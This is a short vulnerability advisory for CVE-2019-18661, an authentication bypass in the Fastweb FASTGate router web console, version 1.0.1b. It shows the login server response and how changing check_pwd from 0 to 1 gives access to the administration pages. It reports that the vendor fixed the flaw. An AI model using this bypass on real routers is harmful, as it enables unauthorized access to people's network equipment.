CVE-2019-18661
Fastweb FASTGate Router
Software version: 1.0.1b
WEB Authentication Bypass:
It’s possible to bypass the authentication login in order to access to the router’s web administration console not knowing the user credentials. After attempting to sign in with random credentials an error message is usually returned and the access to the web console is denied. It’s possible to bypass that logical control by modifying the check_pwd return value from 0 to 1 in the server’s response.
Regular Response with random credentials:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, DD MM 2019 22:18:45 GMT
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
CONTENT-LANGUAGE: en
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline'
Content-Length: 96
{
"login_confirm":{
"login_confirm":"end",
"check_user":"1",
"check_pwd":"0"
}
}
Modified Response after using random credentials:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, DD MM 2019 22:18:45 GMT
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
CONTENT-LANGUAGE: en
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline'
Content-Length: 96
{
"login_confirm":{
"login_confirm":"end",
"check_user":"1",
"check_pwd":"1"
}
}
There is not a configuration disclosure but the web console is fully navigable and it is possible to provide an attacker visibility of all web pages and features of the administration console. The user appears really authenticated, as shown by the presence of the logout button. An unauthorized user should not have the possibility to access and see the administrative features and any unauthorized request should be redirect to the default login page.
The vulnerability was reported to the fastweb team that promptly proceeded to fix it.